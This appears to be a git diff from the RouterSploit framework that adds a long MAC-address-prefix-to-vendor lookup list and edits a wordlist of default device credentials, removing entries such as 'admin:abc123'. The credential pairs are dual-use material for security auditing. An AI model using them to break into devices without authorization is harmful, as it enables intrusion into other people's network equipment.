+00DBDF Intel Corporate +0C8BFD Intel Corporate +E09D31 Intel Corporate +CC3D82 Intel Corporate +D00ED9 Taicang T&W Electronics +6C2995 Intel Corporate +40E3D6 Aruba Networks +24DEC6 Aruba Networks +D8C7C8 Aruba Networks +900BC1 Sprocomm Technologies +6C71D9 AzureWave Technology +384FF0 AzureWave Technology +0015AF AzureWave Technology +485D60 AzureWave Technology +54E4BD Fn-link Technology Limited +98743D Shenzhen Jun Kai Hengye Technology +A04FD4 ADB Broadband Italia +842615 ADB Broadband Italia +5CE2F4 AcSiP Technology +002662 Actiontec Electronics +00193E ADB Broadband Italia +0013C8 ADB Broadband Italia +DC0B1A ADB Broadband Italia +74888B ADB Broadband Italia +ACD074 Espressif +D05349 Liteon Technology +000941 Allied Telesis R&D Center K.K. +00014A Sony +001CA4 Sony Mobile Communications AB +002345 Sony Mobile Communications AB +8C6422 Sony Mobile Communications AB +90C115 Sony Mobile Communications AB +8400D2 Sony Mobile Communications AB +5CB524 Sony Mobile Communications AB +94A1A2 Ampak Technology +74DE2B Liteon Technology +68A3C4 Liteon Technology +C8FF28 Liteon Technology +0024D2 Askey Computer +DC64B8 Shenzhen JingHanDa ElectronicsLtd +C4DA7D Ivium Technologies +9492BC Syntech(hk) Technology Limited +001A4F AVM GmbH +00040E AVM GmbH +0016E3 Askey Computer +00300A Aztech Electronics Pte +9CC7A6 AVM GmbH +743170 Arcadyan Technology +A8D3F7 Arcadyan Technology +7C4FB5 Arcadyan Technology +0012BF Arcadyan Technology +04FE8D Huawei Technologies +480031 Huawei Technologies +0019FB BSkyB +0CF9C0 BSkyB +001BA9 Brother industries +0011B6 Open Systems International +E03E44 Broadcom +D40129 Broadcom +FCB698 Cambridge Industries(Group) +00E03A Cabletron Systems +000117 Canal + +0019C7 Cambridge Industries(Group) +006DFB Vutrix Technologies +C81073 Century Opticomm +744AA4 zte +9CD35B Samsung Electronics +60AF6D Samsung Electronics +B85A73 Samsung Electronics +103047 Samsung Electronics +109266 Samsung Electronics +B047BF Samsung Electronics +7C0BC6 Samsung Electronics +804E81 Samsung Electronics +244B81 Samsung Electronics +50A4C8 Samsung Electronics +8425DB Samsung Electronics +D8C4E9 Samsung Electronics +50C8E5 Samsung Electronics +446D6C Samsung Electronics +38D40B Samsung Electronics +647791 Samsung Electronics +781FDB Samsung Electronics +08FC88 Samsung Electronics +30C7AE Samsung Electronics +18227E Samsung Electronics +00F46F Samsung Electronics +9CE6E7 Samsung Electronics +0090A2 CyberTAN Technology +0030DA Comtrend +64680C Comtrend +00CF1C Communication Machinery +0090F5 Clevo +0030FF DataFab Systems +E498D1 Microsoft Mobile Oy +A8A089 Tactical Communications +48365F Wintecronics +005A39 Shenzhen Fast Technologies +5CC6D0 Skyworth Digital Technology(Shenzhen) +080581 Roku +B0A737 Roku +B83E59 Roku +DC3A5E Roku +0014A5 Gemtek Technology +001742 Fujitsu Limited +2C10C1 Nintendo +CCFB65 Nintendo +40D28A Nintendo +7CBB8A Nintendo +00224C Nintendo +0023CC Nintendo +002444 Nintendo +E0E751 Nintendo +0017AB Nintendo +001BEA Nintendo +0015DE Nokia Danmark A/S +001370 Nokia Danmark A/S +00247C Nokia Danmark A/S +0023B4 Nokia Danmark A/S +0021AB Nokia Danmark A/S +001FDF Nokia Danmark A/S +00194F Nokia Danmark A/S +00188D Nokia Danmark A/S +00180F Nokia Danmark A/S +547975 Nokia +2CCC15 Nokia +00BD3A Nokia +0026CC Nokia Danmark A/S +00164E Nokia Danmark A/S +0016BC Nokia Danmark A/S +001ADC Nokia Danmark A/S +002668 Nokia Danmark A/S +001F5C Nokia Danmark A/S +001F00 Nokia Danmark A/S +001E3B Nokia Danmark A/S +A04E04 Nokia +240B0A Palo Alto Networks +C4E510 Mechatro +74C330 Shenzhen Fast Technologies +403F8C TP-Link Technologies +14C3C2 K.A. Schmersal GmbH & KG +10785B Actiontec Electronics +20768F Apple +9C5CF9 Sony Mobile Communications AB +88A084 Formation Data Systems +0025DC Sumitomo Electric Industries +001CFC Sumitomo Electric Industries +8CC661 Current, powered by GE +009050 Teleste +BC44B0 Elastifile +7864E6 Green Motive Technology Limited +C0CCF8 Apple +80ED2C Apple +E8B2AC Apple +0080B8 DMG Mori B.u.g. +8489AD Apple +40B688 Legic Identsystems AG +A09D91 SoundBridge +30785C Partow Tamas Novin (Parman) +441102 Edmi Europe +2C21D7 Imax +0026F7 Nivetti Systems Pvt. +24C3F9 Securitas Direct AB +DC4D23 MRV Comunications +085BDA CliniCare +0C5A9E Wi-SUN Alliance +00C164 Cisco Systems +98E7F5 Huawei Technologies +24BCF8 Huawei Technologies +10D0AB zte +202DF8 Digital Media Cartridge +042DB4 First Property (beijing), Modern Moma Branch +008A96 Cisco Systems +007888 Cisco Systems +98DED0 TP-Link Technologies +30FC68 TP-Link Technologies +5CCA1A Microsoft Mobile Oy +000594 HMS Industrial Networks +000AC2 Wuhan FiberHome Digital Technology +D4F207 Diaodiao(beijing)technology +FCF8B7 Tronteq Electronic +D4883F Hdpro +001BF3 Transradio Sendersysteme Berlin AG +E0071B Hewlett Packard Enterprise +A86AC1 HanbitEDS +88B1E1 Mojo Networks +74DFBF Liteon Technology +FC3F7C Huawei Technologies +608334 Huawei Technologies +84AD58 Huawei Technologies +746FF7 Wistron Neweb +B01BD2 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited +74852A Pegatron +386077 Pegatron +60B4F7 Plume Design +A4D8CA Hong Kong Water World Technology Limited +00109B Emulex +00E0D5 Emulex +001035 Elitegroup Computer Systems +ECA86B Elitegroup Computer Systems +4487FC Elitegroup Computer Systems +002197 Elitegroup Computer Systems +649968 Elentec +00208F ECI Telecom +9CDF03 Harman/Becker Automotive Systems GmbH +94885E Surfilter Network Technology +002378 GN Netcom A/S +002088 Global Village Communication +90C7D8 zte +BC6A44 Commend International GmbH +0020F2 Oracle +00015D Oracle +943BB1 Kaonmedia +146308 Jabil Circuit (shanghai) +08000D International Computers +00D0A2 Integrated Device +0060B1 Input/Output +00177D IDT Technology Limited +288A1C Juniper Networks +100E7E Juniper Networks +84B59C Juniper Networks +544B8C Juniper Networks +541E56 Juniper Networks +64649B Juniper Networks +2C6BF5 Juniper Networks +002283 Juniper Networks +EC13DB Juniper Networks +AC4BC8 Juniper Networks +B0A86E Juniper Networks +3C94D5 Juniper Networks +F4CC55 Juniper Networks +002159 Juniper Networks +3497F6 Asustek Computer +50680A Huawei Technologies +D89403 Hewlett Packard Enterprise +9C8D7C Alps Electric +E04F43 Universal Global Scientific Industrial +B0E03C TCT mobile +D09DAB TCT mobile +94D859 TCT mobile +9471AC TCT mobile +70BAEF Hangzhou H3C Technologies, Limited +009006 Hamamatsu Photonics K.K. +001AF4 Handreamnet +000AED Harting Electronics Gmbh +1CCB99 TCT mobile +18E3BC TCT mobile +289AFA TCT mobile +44A42D TCT mobile +8C8EF2 Apple +F40F24 Apple +A0D385 Auma Riester Gmbh & KG +1414E6 Ningbo Sanhe Digital +84A134 Apple +1C9148 Apple +CC167E Cisco Systems +600810 Huawei Technologies +C85B76 Lcfc(hefei) Electronics Technology +001AE8 Unify Software and Solutions GmbH & KG +945907 Shanghai Hite-belden Network Technology +48C663 GTO Access Systems +606453 AOD +6C98EB Riverbed Technology +DC293A Shenzhen Nuoshi Technology +40562D Smartron India Pvt +70288B Samsung Electronics +00809F ALE International +B0D7CC Tridonic GmbH & KG +7C574E Cobi Gmbh +34C0F9 Rockwell Automation +20C047 Verizon +AC0481 Jiangsu Huaxing Electronics +FC2D5E zte +E811CA Shandong Kaer Electric.co. +ECD68A Shenzhen JMicron Intelligent Technology Developmen +08D0B7 Qingdao Hisense Communications +28285D ZyXEL Communications +5CF4AB ZyXEL Communications +4C9EFF ZyXEL Communications +0023F8 ZyXEL Communications +B0B2DC ZyXEL Communications +90EF68 ZyXEL Communications +A8AD3D Alcatel-Lucent Shanghai Bell +E03005 Alcatel-Lucent Shanghai Bell +2824FF Wistron Neweb +14C1FF ShenZhen QianHai Comlan communication +EC8EB5 Hewlett Packard +70AF6A Shenzhen Fenglian Technology +0026F1 ProCurve Networking by HP +B439D6 ProCurve Networking by HP +001CEF Primax Electronics +000276 Primax Electronics +4849C7 Samsung Electronics +001F9A Nortel Networks +0014C7 Nortel Networks +001540 Nortel Networks +0017D1 Nortel Networks +0015E8 Nortel Networks +001660 Nortel Networks +001BBA Nortel Networks +205EF7 Samsung Electronics +00034B Nortel Networks +00001B Novell +00E011 Uniden +B03EB0 Microdia +00126C Visonic Technologies 1993 +18ABF5 Ultra Electronics Electrics +304487 Hefei Radio Communication Technology +AC6175 Huawei Technologies +AC482D Ralinwi Nanjing Electronic Technology +A48269 Datrium +441441 AudioControl +0018DA Amber Wireless Gmbh +EC24B8 Texas Instruments +68C90B Texas Instruments +F4B85E Texas Instruments +5C313E Texas Instruments +A0E6F8 Texas Instruments +20C38F Texas Instruments +D0FF50 Texas Instruments +7472B0 Guangzhou Shiyuan Electronics +44BFE3 Shenzhen Longtech Electronics +F45214 Mellanox Technologies +689E19 Texas Instruments +985945 Texas Instruments +1CE2CC Texas Instruments +44C15C Texas Instruments +0017E9 Texas Instruments +0017E7 Texas Instruments +D00790 Texas Instruments +04E451 Texas Instruments +B0D5CC Texas Instruments +5CF821 Texas Instruments +FC0F4B Texas Instruments +3C6FEA Panasonic India Pvt. +A863F2 Texas Instruments +948854 Texas Instruments +001237 Texas Instruments +BC6A29 Texas Instruments +C0E422 Texas Instruments +001830 Texas Instruments +1CBA8C Texas Instruments +58FB84 Intel Corporate +E0E7BB Nureva +7CA97D Objenious +BC8AA3 NHN Entertainment +70A84C Monad. +00A289 Cisco Systems +6C1E90 Hansol Technics +486DBB Vestel Elektronik San ve Tic. A.. +E09DFA Wanan Hongsheng ElectronicLtd +34E71C Shenzhen Youhua Technology +182861 AirTies Wireless Networks +8841FC AirTies Wireless Networks +182666 Samsung Electronics +C06599 Samsung Electronics +CC07AB Samsung Electronics +E84E84 Samsung Electronics +50FC9F Samsung Electronics +E432CB Samsung Electronics +889B39 Samsung Electronics +BCB1F3 Samsung Electronics +38ECE4 Samsung Electronics +CCF9E8 Samsung Electronics +F0E77E Samsung Electronics +5CE8EB Samsung Electronics +B8D9CE Samsung Electronics +70F927 Samsung Electronics +301966 Samsung Electronics +28BAB5 Samsung Electronics +103B59 Samsung Electronics +6CB7F4 Samsung Electronics +001EE1 Samsung Electronics +0018AF Samsung Electronics +BC72B1 Samsung Electronics +78F7BE Samsung Electronics +F49F54 Samsung Electronics +7C11CB Huawei Technologies +A4CAA0 Huawei Technologies +00214C Samsung Electronics +001632 Samsung Electronics +D0667B Samsung Electronics +38AA3C Samsung Electro Mechanics +206432 Samsung Electro Mechanics +002637 Samsung Electro Mechanics +001377 Samsung Electronics +50B7C3 Samsung Electronics +8018A7 Samsung Electronics +5CA39D Samsung Electro Mechanics +B88EDF Zencheer Communication Technology +D85DE2 Hon Hai Precision Ind. +707781 Hon Hai Precision Ind. +606DC7 Hon Hai Precision Ind. +681401 Hon Hai Precision Ind. +0071CC Hon Hai Precision Ind. +F866D1 Hon Hai Precision Ind. +F80D43 Hon Hai Precision Ind. +002268 Hon Hai Precision Ind. +001FE1 Hon Hai Precision Ind. +002556 Hon Hai Precision Ind. +00265C Hon Hai Precision Ind. +90CDB6 Hon Hai Precision Ind. +001E4C Hon Hai Precision Ind. +F8DA0C Hon Hai Precision Ind. +9034FC Hon Hai Precision Ind. +906EBB Hon Hai Precision Ind. +342387 Hon Hai Precision Ind. +689423 Hon Hai Precision Ind. +B8763F Hon Hai Precision Ind. +1C3E84 Hon Hai Precision Ind. +C01885 Hon Hai Precision Ind. +785968 Hon Hai Precision Ind. +1C666D Hon Hai Precision Ind. +CCAF78 Hon Hai Precision Ind. +904CE5 Hon Hai Precision Ind. +B01041 Hon Hai Precision Ind. +7487A9 OCT Technology +E0286D AVM Audiovisuelles Marketing und Computersysteme GmbH +444E1A Samsung Electronics +E8E5D6 Samsung Electronics +5492BE Samsung Electronics +101DC0 Samsung Electronics +0021D1 Samsung Electronics +5CA933 Luma Home +2CDD95 Taicang T&W Electronics +AC84C9 Sagemcom Broadband SAS +107223 Tellescom Industria E Comercio EM Telecomunicacao +CCB0DA Liteon Technology +14EDBB 2Wire +44BA46 Sichuan Tianyi Comheart Telecomco. +B4D135 Cloudistics +085DDD Mercury +6CEC5A Hon Hai Precision Ind. +5001D9 Huawei Technologies +44C346 Huawei Technologies +884477 Huawei Technologies +047503 Huawei Technologies +2C402B Smart iBlue Technology Limited +180675 Dilax Intelcom GmbH +30AEA4 Espressif +0C4933 Sichuan Jiuzhou Electronic Technology +7828CA Sonos +B8E937 Sonos +B05216 Hon Hai Precision Ind. +002926 Applied Optoelectronics, Taiwan Branch +68DFDD Xiaomi Communications +C46AB7 Xiaomi Communications +FC64BA Xiaomi Communications +2082C0 Xiaomi Communications +3480B3 Xiaomi Communications +7451BA Xiaomi Communications +64B473 Xiaomi Communications +8C2FA6 Solid Optics +B0A2E7 Shenzhen Tinno Mobile Technology +BCA8A6 Intel Corporate +101331 Technicolor +38AFD7 Fujitsu Limited +28993A Arista Networks +B0E892 Seiko Epson +AC1826 Seiko Epson +886639 Huawei Technologies +D8197A Nuheara +8CE117 zte +64136C zte +0005CD D&M Holdings +8C9351 Jigowatts +00248D Sony Interactive Entertainment +54276C Jiangsu Houge Technology +FCFFAA Ieee Registration Authority +70B3D5 Ieee Registration Authority +40D855 Ieee Registration Authority +48DF37 Hewlett Packard Enterprise +74F8DB Ieee Registration Authority +0CEFAF Ieee Registration Authority +28FD80 Ieee Registration Authority +B0C5CA Ieee Registration Authority +9802D8 Ieee Registration Authority +D07650 Ieee Registration Authority +BC6641 Ieee Registration Authority +0028F8 Intel Corporate +8416F9 TP-Link Technologies +CCD31E Ieee Registration Authority +8C192D Ieee Registration Authority +E81863 Ieee Registration Authority +C44BD1 Wallys Communications Teachnologies +2057AF Shenzhen Fh-net Optoelectronics +34EA34 HangZhou Gubei Electronics Technology +CC2D8C LG Electronics +00116E Peplink International +A091C8 zte +002597 Kalki Communication Technologies +882BD7 Addnergie Technologies +B4A5EF Sercomm +3044A1 Shanghai Nanchao Information Technology +C4F1D1 Beijing Sogou Technology Development +38A28C Shenzhen Rf-link Technology +58528A Mitsubishi Electric +B0C287 Technicolor CH USA +CC03FA Technicolor CH USA +28BE9B Technicolor CH USA +509F3B OI Electric +E4029B Intel Corporate +6002B4 Wistron Neweb +98EECB Wistron Infocomm (Zhongshan) +70E284 Wistron Infocomm (Zhongshan) +80EA23 Wistron Neweb +D88039 Microchip Technology +FC3D93 Longcheer Telecommunication Limited +48F7C0 Technicolor CH USA +00409F Telco Systems +00E09E Quantum +00148C General Dynamics Mission Systems +A47174 Huawei Technologies +D4A148 Huawei Technologies +D065CA Huawei Technologies +8CEBC6 Huawei Technologies +B808D7 Huawei Technologies +FCF152 Sony +784476 Zioncom Electronics (Shenzhen) +00183A Westell Technologies +E89A8F Quanta Computer +001B24 Quanta Computer +CC52AF Universal Global Scientific Industrial +001A6B Universal Global Scientific Industrial +00DD0A Ungermann-bass +00039D Qisda +000B0E Trapeze Networks +002318 Toshiba +E89D87 Toshiba +E8E0B7 Toshiba +001428 Vocollect +006B9E Vizio +0024FF QLogic +00A0C6 Qualcomm +ECAAA0 Pegatron +E8886C Shenzhen SC Technologies +DC35F1 Positivo Informtica SA. +EC6881 Palo Alto Networks +44334C Shenzhen Bilian electronic +D84FB8 LG Electronics +9C220E Tascan Systems Gmbh +0CA402 Alcatel-Lucent IPD +00164D Alcatel-Lucent IPD +FCFAF7 Shanghai Baud Data Communication +C8E776 Ptcom Technology +70F8E7 Ieee Registration Authority +949AA9 Microsoft +C4084A Nokia +0C54B9 Nokia +8C90D3 Nokia +34AA99 Nokia +F8633F Intel Corporate +088620 Tecno Mobile Limited +A42983 Boeing Defence Australia +702E22 zte +0023B9 Airbus Defence and Space Deutschland GmbH +B0C128 Adler Elreha Gmbh +C8F946 Locosys Technology +2047ED BSkyB +D41D71 Palo Alto Networks +5C2443 O-Sung Telecom +1861C7 lemonbeat GmbH +9CDC71 Hewlett Packard Enterprise +240D65 Shenzhen Vsun Communication Technology +D8452B Integrated Device Technology (Malaysia) Sdn. Bhd. +C8028F Nova Electronics (Shanghai) +60EFC6 Shenzhen Chima Technologies Limited +502B73 Tenda Technology,Ltd.Dongguan branch +20DBAB Samsung Electronics +000DF0 Qcom Technology +5C9960 Samsung Electronics +5CF7E6 Apple +A0D795 Apple +CC088D Apple +0080FB BVM Limited +002722 Ubiquiti Networks +687251 Ubiquiti Networks +B4FBE4 Ubiquiti Networks +188B15 ShenZhen ZhongRuiJing Technology +E02CF3 MRS Electronic GmbH +F41F88 zte +D816C1 Dewav (hk) Electronics Limited +7CCC1F Sichuan Tianyi Comheart Telecomco. +C0854C Ragentek Technology Group +00FD45 Hewlett Packard Enterprise +9C83BF Pro-vision +9C13AB Chanson Water +883C1C Mercury +9C5D12 Aerohive Networks +001F82 Cal-Comp Electronics & Communications Company +0C0227 Technicolor CH USA +C0288D Logitech +9C1E95 Actiontec Electronics +E078A3 Shanghai Winner Information Technology +B49691 Intel Corporate +7CCBE2 Ieee Registration Authority +9CD9CB Lesira Manufacturing +002590 Super Micro Computer +187532 Sichuan Tianyi Comheart Telecomco. +E0DCA0 Siemens Industrial Automation Products Chengdu +A4580F Ieee Registration Authority +DCD255 Kinpo Electronics +B0EE7B Roku +E8EADA Denkovi Assembly Electronics +40ED98 Ieee Registration Authority +480C49 Nakayo +00D0EC Nakayo +B0702D Apple +D0C5F3 Apple +60F445 Apple +00B362 Apple +F86214 Apple +C0E54E Aries Embedded Gmbh +001D72 Wistron +0C73BE Dongguan Haimai Electronie Technology +20780B Delta Faucet Company +24D51C Zhongtian broadband technology +28FECD Lemobile Information Technology (Beijing) +001992 Adtran +4C1694 shenzhen sibituo Technology +6C160E ShotTracker +7C1015 Brilliant Home Technology +4C7872 Cav. Uff. Giacomo Cimberio S.p.A. +78C1A7 zte +540384 Hangkong Nano IC Technologies +004BF3 Shenzhen Mercury Communication Technologies +28A24B Juniper Networks +044E06 Ericsson AB +001BB5 Cherry GmbH +6014B3 CyberTAN Technology +602103 I4vine +407D0F Huawei Technologies +3805AC Piller Group GmbH +F8BBBF eero +000130 Extreme Networks +706DEC Wifi-soft +AC6B0F Cadence Design Systems +1CA0D3 Ieee Registration Authority +34D270 Amazon Technologies +CC82EB Kyocera +00BB3A Private +E0CB1D Private +84D6D0 Amazon Technologies +5082D5 Apple +9C84BF Apple +7894B4 Sercomm +000F17 Insta Elektro GmbH +002365 Insta Elektro GmbH +C4EEF5 II-VI Incorporated +A41163 Ieee Registration Authority +002CC8 Cisco Systems +70AF24 TP Vision Belgium NV +7CE97C Itel Mobile Limited +285F2F RNware +948BC1 Samsung Electronics +4827EA Samsung Electronics +E0C0D1 CK Telecom (Shenzhen) Limited +049573 zte +48BF6B Apple +245BA7 Apple +BCA920 Apple +D055B2 Integrated Device Technology (Malaysia) Sdn. Bhd. +A49BF5 Hybridserver Tec GmbH +B436E3 Kbvision Group +488803 ManTechnology +7C6BF7 NTI +54E061 Sichuan Tianyi Comheart Telecomco. +B47C9C Amazon Technologies +E81367 Airsound +64D154 Routerboard.com +0020DA Alcatel-Lucent Enterprise +345BBB GD Midea Air-Conditioning Equipment +34CE00 Xiaomi Electronics,co. +F82F08 Molex +68262A Sichuan Tianyi Comheart Telecomco. +680235 Konten Networks +3C678C Huawei Technologies +D06F82 Huawei Technologies +844765 Huawei Technologies +A0C4A5 Sygn House +506787 Planet Networks +C83A6B Roku +B4C6F8 Axilspot Communication +B83A08 Tenda Technology,Ltd.Dongguan branch +388C50 LG Electronics +50D37F Yu Fly Mikly Way Science and Technology +D8D866 Shenzhen Tozed Technologies +F43E61 Shenzhen Gongjin Electronics +001FA4 Shenzhen Gongjin Electronics +38AC3D Nephos +A09347 Guangdong Oppo Mobile Telecommunications +C8F230 Guangdong Oppo Mobile Telecommunications +1C77F6 Guangdong Oppo Mobile Telecommunications +E44790 Guangdong Oppo Mobile Telecommunications +1C5A0B Tegile Systems +D4503F Guangdong Oppo Mobile Telecommunications +CC90E8 Shenzhen Youhua Technology +D8C8E9 Phicomm (Shanghai) +8425A4 Tariox Limited +88CC45 Skyworth Digital Technology(Shenzhen) +605317 Sandstone Technologies +50338B Texas Instruments +986C5C Jiangxi Gosun Guard Security +F4FCB1 JJ +543B30 duagon AG +60BA18 nextLAP GmbH +704CA5 Fortinet +5C497D Samsung Electronics +E47DBD Samsung Electronics +503DA1 Samsung Electronics +5CF6DC Samsung Electronics +380195 Samsung Electronics +BC1485 Samsung Electronics +40163B Samsung Electronics +508569 Samsung Electronics +1077B1 Samsung Electronics +88D50C Guangdong Oppo Mobile Telecommunications +509A4C Dell +00180A Cisco Meraki +AC2205 Compal Broadband Networks +80A036 Shanghai Mxchip Information Technology +D42C0F Arris Group +8496D8 Arris Group +80F503 Arris Group +5CB066 Arris Group +C0C522 Arris Group +E0B7B1 Arris Group +94877C Arris Group +407009 Arris Group +F8EDA5 Arris Group +5465DE Arris Group +6CCA08 Arris Group +5C8FE0 Arris Group +001675 Arris Group +00D088 Arris Group +0017EE Arris Group +001180 Arris Group +00909C Arris Group +8096B1 Arris Group +7CBFB1 Arris Group +0012C9 Arris Group +984B4A Arris Group +001A77 Arris Group +CC7D37 Arris Group +0017E2 Arris Group +001784 Arris Group +0016B5 Arris Group +BCCAB5 Arris Group +000FCC Arris Group +3C7A8A Arris Group +ACEC80 Arris Group +0015A3 Arris Group +0015A4 Arris Group +9C3426 Arris Group +001DD2 Arris Group +00211E Arris Group +002210 Arris Group +001FC4 Arris Group +001C12 Arris Group +001CFB Arris Group +0024A0 Arris Group +002636 Arris Group +E48399 Arris Group +2CA17D Arris Group +04714B Ieee Registration Authority +309C23 Micro-star Intl +8C395C Bit4id Srl +947BE7 Samsung Electronics +2C2617 Oculus VR +98F7D7 Arris Group +2C41A1 Bose +C8DE51 IntegraOptics +182CB4 Nectarsoft +14780B PerkinElmer Technologies GmbH & KG +74DADA D-Link International +4C910C Corporativo Lanix S.A. de C.V. +BCD713 Owl Labs +E8E1E1 Gemtek Technology +98F2B3 Hewlett Packard Enterprise +30FE31 Nokia +BC1C81 Sichuan iLink Technology +703018 Avaya +CCF954 Avaya +581626 Avaya +B4B017 Avaya +64C354 Avaya +F873A2 Avaya +646A52 Avaya +64A7DD Avaya +6CFA58 Avaya +3475C7 Avaya +C4BED4 Avaya +000CAB Commend International GmbH +78B28D Beijing Tengling TechnologyLtd +00EC0A Xiaomi Communications +A86B7C Shenzhen Fenglian Technology +1CDA27 vivo Mobile Communication +70D923 vivo Mobile Communication +9CA5C0 vivo Mobile Communication +F430B9 Hewlett Packard +943FC2 Hewlett Packard Enterprise +A06A44 Vizio +2C9EEC Jabil Circuit Penang +B44F96 Zhejiang Xinzailing Technology +D822F4 Avnet Silica +58493B Palo Alto Networks +D083D4 Xtel Wireless ApS +7CEB7F Dmet Products +8C8580 Smart Innovation +FC5A1D Hitron Technologies. +287B09 zte +4859A4 zte +3894E0 Syrotech Networks. +34F64B Intel Corporate +C4571F June Life +18204C Kummler+Matter AG +740ABC LightwaveRF Technology +ACED5C Intel Corporate +54BD79 Samsung Electronics +94F665 Ruckus Wireless +E0107F Ruckus Wireless +001392 Ruckus Wireless +D838FC Ruckus Wireless +0CF4D5 Ruckus Wireless +743E2B Ruckus Wireless +AC6706 Ruckus Wireless +7811DC Xiaomi Electronics,co. +D86C63 Google +D837BE Shenzhen Gongjin Electronics +DC44B6 Samsung Electronics +1007B6 Samsung Electronics +F4939F Hon Hai Precision Ind. +000C03 Hdmi Licensing +CC2F71 Intel Corporate +F82819 Liteon Technology +F4B520 Biostar Microtech international +9C93E4 Private +D4B27A Arris Group +F0F8F2 Texas Instruments +341513 Texas Instruments +64CFD9 Texas Instruments +24B2DE Espressif +78D800 Ieee Registration Authority +50E971 Jibo +50642B Xiaomi Electronics,co. +909D7D Arris Group +84A1D1 Sagemcom Broadband SAS +788102 Sercomm +783690 Yulong Computer Telecommunication Scientific (Shenzhen) +58A0CB TrackNet +3C7843 Huawei Technologies +A47758 Ningbo Freewings Technologies +586163 Quantum Networks (SG) Pte. +00051E Brocade Communications Systems +080088 Brocade Communications Systems +00010F Brocade Communications Systems +0014C9 Brocade Communications Systems +200CC8 Netgear +DCEF09 Netgear +A06391 Netgear +A040A0 Netgear +8C3BAD Netgear +001E2A Netgear +00184D Netgear +0026F2 Netgear +30469A Netgear +4C60DE Netgear +E8FCAF Netgear +00197F Plantronics +E4F4C6 Netgear +005079 Private +F86465 Anova Applied Electronics +A830AD Weifang GoerTek Technology +70E1FD Flextronics +001D44 Krohne +D4D2E5 Bkav +C06D1A Tianjin Henxinhuifeng Technology +E470B8 Intel Corporate +3432E6 Panasonic Industrial Devices Europe GmbH +40A3CC Intel Corporate +B019C6 Apple +58E28F Apple +AC1F74 Apple +9C305B Hon Hai Precision Ind. +FCE557 Nokia +303855 Nokia +8C4500 Murata Manufacturing +00289F Semptian +6C7660 Kyocera +104B46 Mitsubishi Electric +903DBD Secure Meters Limited +384F49 Juniper Networks +A491B1 Technicolor +8CD48E Itel Mobile Limited +642B8A ALL Best Industrial +68ECC5 Intel Corporate +CC9891 Cisco Systems +1C7022 Murata Manufacturing +189BA5 Ieee Registration Authority +947EB9 National Narrowband Network Communications +4CBD8F Hangzhou Hikvision Digital Technology +B4D64E Caldero Limited +F89DBB Tintri +D4389C Sony Mobile Communications AB +104963 Harting K.K. +646E69 Liteon Technology +BC3D85 Huawei Technologies +B0E17E Huawei Technologies +74D21D Huawei Technologies +44C874 China Mobile Group Device +98EF9B Ohsung +84E327 Tailyn Technologies +7091F3 Universal Electronics +F4E204 Traqueur +68C63A Espressif +3456FE Cisco Meraki +08674E Hisense broadband multimedia technology +F08CFB Fiberhome Telecommunication Technologies +F0407B Fiberhome Telecommunication Technologies +BCC00F Fiberhome Telecommunication Technologies +6405E9 Shenzhen WayOS Technology Crop. +B8C716 Fiberhome Telecommunication Technologies +50A83A S Mobile Devices Limited +EC8AC7 Fiberhome Telecommunication Technologies +E084F3 High Grade Controls +74BBD3 Shenzhen xeme Communication +D8ED1C Magna Technology SL +78617C Mitsumi Electric +00A096 Mitsumi Electric +A07099 Beijing Huacan Electronics +B0935B Arris Group +20F19E Arris Group +389D92 Seiko Epson +C0174D Samsung Electronics +A407B6 Samsung Electronics +149F3C Samsung Electronics +74860B Cisco Systems +149FB6 Guangdong Genius Technology +7C1C4E LG Innotek +70708B Cisco Systems +BC903A Robert Bosch GmbH +603D26 Technicolor CH USA +3820A8 ColorTokens +705896 InShow Technology +D05995 Fiberhome Telecommunication Technologies +54DF24 Fiberhome Telecommunication Technologies +78870D Unifiedgateways India Private Limited +3CA616 vivo Mobile Communication +B4A382 Hangzhou Hikvision Digital Technology +88B4A6 Motorola Mobility, a Lenovo Company +742857 Mayfield Robotics +00CB00 Private +609BC8 Hipad Intelligent Technology +1C0FAF Lucid Vision Labs +245CCB AXIe Consortium +F8F21E Intel Corporate +282986 APC by Schneider Electric +386B1C Shenzhen Mercury Communication Technologies +38019F Shenzhen Fast Technologies +002424 Ace Axis Limited +74DA38 Edimax Technology +D0D2B0 Apple +D88F76 Apple +3C2EF9 Apple +24F677 Apple +7867D7 Apple +5433CB Apple +8C839D Shenzhen Xinyupeng Electronic Technology +ECFAF4 SenRa Tech Pvt. +70991C Shenzhen Honesty Electronics +0081F9 Texas Instruments +587A62 Texas Instruments +D06726 Hewlett Packard Enterprise +282373 Digita +44CD0E Flextronics Manufacturing(zhuhai)co. +088466 Novartis Pharma AG +8C5BF0 Arris Group +001F7D Embedded Wireless GmbH +947BBE Ubicquia +E82A44 Liteon Technology +0005A7 Hyperchip +000966 Trimble Europe BV +78DDD9 Guangzhou Shiyuan Electronics +2C5491 Microsoft +58C17A Cambium Networks Limited +ECB0E1 Ciena +08BC20 Hangzhou Royal Cloud Technology +5C70A3 LG Electronics (Mobile Communications) +10F96F LG Electronics (Mobile Communications) +F01C13 LG Electronics (Mobile Communications) +00AA70 LG Electronics (Mobile Communications) +0450DA Qiku Internet Network Scientific (Shenzhen) +C49A02 LG Electronics (Mobile Communications) +344DF7 LG Electronics (Mobile Communications) +805A04 LG Electronics (Mobile Communications) +5CAF06 LG Electronics (Mobile Communications) +B81DAA LG Electronics (Mobile Communications) +10F1F2 LG Electronics (Mobile Communications) +BCF5AC LG Electronics (Mobile Communications) +CCFA00 LG Electronics (Mobile Communications) +F8A9D0 LG Electronics (Mobile Communications) +0025E5 LG Electronics (Mobile Communications) +0022A9 LG Electronics (Mobile Communications) +449160 Murata Manufacturing +44D5A5 AddOn Computer +00AECD Pensando Systems +525400 QEMU virtual NIC +B0C420 Bochs virtual NIC +DEADCA PearPC virtual NIC +00FFD1 Cooperative Linux virtual NIC +080027 Oracle VirtualBox virtual NIC diff --git a/routersploit/wordlists/__init__.py b/routersploit/resources/wordlists/__init__.py similarity index 100% rename from routersploit/wordlists/__init__.py rename to routersploit/resources/wordlists/__init__.py diff --git a/routersploit/wordlists/defaults.txt b/routersploit/resources/wordlists/defaults.txt similarity index 99% rename from routersploit/wordlists/defaults.txt rename to routersploit/resources/wordlists/defaults.txt index b2e98d3e1..6f03de20c 100644 --- a/routersploit/wordlists/defaults.txt +++ b/routersploit/resources/wordlists/defaults.txt @@ -7,7 +7,6 @@ ADMINISTRATOR:ADMINISTRATOR ADMN:admn ADVMAIL:HP ADVMAIL:HPOFFICE -admin:abc123 admin:cciadmin admin:zhone Admin:admin @@ -349,7 +348,6 @@ root:3ep5w2u root:Cisco root:Mau'dib root:ROOT500 